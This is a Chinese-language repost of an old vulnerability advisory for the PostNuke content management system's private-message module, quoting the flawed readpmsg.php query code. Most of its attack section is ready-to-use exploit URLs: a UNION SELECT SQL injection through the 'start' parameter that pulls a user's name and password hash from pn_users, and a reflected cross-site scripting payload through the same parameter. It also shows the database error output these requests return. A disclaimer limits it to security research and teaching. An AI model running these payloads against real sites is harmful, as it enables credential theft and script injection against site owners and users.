当前位置: 首页 >数据库 > PostNuke SQL注入和跨站脚本漏洞

PostNuke SQL注入和跨站脚本漏洞

PostNuke是开放源码,开放开发的内容管理系统(CMS)
PostNuke中存在SQL注入和跨站脚本漏洞,PostNuke的readmsg.php脚本没有充分过滤start参数值,攻击者可以提交恶意SQL命令作为此参数数据,导致更改原来的SQL逻辑,可造成数据库更改或信息泄露。

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/modules/Messages/readpmsg.php

=======================
$sql = "SELECT $column[msg_id] AS \"msg_id\",
                    $column[msg_image] AS \"msg_image\",
                    $column[subject] AS \"subject\",
                    $column[from_userid] AS \"from_userid\",
                    $column[to_userid] AS \"to_userid\",
                    $column[msg_time] AS \"msg_time\",
                    $column[msg_text] AS \"msg_text\",
                    $column[read_msg] AS \"read_msg\"
            FROM $pntable[priv_msgs]
            WHERE $column[to_userid]='" . (int)pnVarPrepForStore($userdata) . "'";

    $resultID =& $dbconn->SelectLimit($sql,1,$start);
    if($dbconn->ErrorNo()<>0) {
        error_log("DB Error: " . $dbconn->ErrorMsg());
        echo $dbconn->ErrorMsg() . "<br />";
        forumerror(0005);
    }
=======================

首先登陆到postnuke,然后向自己发送消息,之后:
http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0[SQL inj]&total_messages=1

注意:
------
total_messages=1 - total_messages的ID必须存在。

之后就可以看到以下错误消息:

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for the right syntax to use near '[SQL injection],1' at line 10 \
========================

SQL注入攻击:
=======================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null%20FROM%20pn_users%20WHERE%20pn_uid=2/*&total_messages=1

跨站脚本攻击:
============================

http://[target]/[postnuke_dir]/modules.php?op=modload&name=Messages&file=readpmsg&start=0'<h1>cXIb8O3 and sp3x - SecurityReason</h1>&total_messages=1

然后就可以得到:

error message :
---------------
========================
You have an error in your SQL syntax; check the manual that corresponds to your MySQL \
server version for the right syntax to use near ''[Our XSS],1' at line 10 \
========================

来源:cookiss 收集!

作者:Cookiss
来源链接:https://www.cnblogs.com/cookiss/archive/2006/10/17/531705.html

版权声明:
1、JavaClub(https://www.javaclub.cn)以学习交流为目的,由作者投稿、网友推荐和小编整理收藏优秀的IT技术及相关内容,包括但不限于文字、图片、音频、视频、软件、程序等,其均来自互联网,本站不享有版权,版权归原作者所有。

2、本站提供的内容仅用于个人学习、研究或欣赏,以及其他非商业性或非盈利性用途,但同时应遵守著作权法及其他相关法律的规定,不得侵犯相关权利人及本网站的合法权利。
3、本网站内容原作者如不愿意在本网站刊登内容,请及时通知本站(javaclubcn@163.com),我们将第一时间核实后及时予以删除。





本文链接:https://www.javaclub.cn/database/117670.html

标签:SQL_syntax
分享给朋友:

“PostNuke SQL注入和跨站脚本漏洞” 的相关文章

MySQL数据库(基础) 2022年05月16日 21:54:19
必须拿下的Mybatis动态SQL 2022年05月17日 21:28:59
mysql之基础查询 2022年06月06日 00:56:31
mysql数据查询——复杂查询 2022年06月09日 23:08:26
shell简单处理mysql查询结果 2022年06月10日 23:22:02
mysql 查询某字段最小的记录 2022年06月12日 13:41:31
MySQL查询指定行的记录 2022年06月14日 06:02:58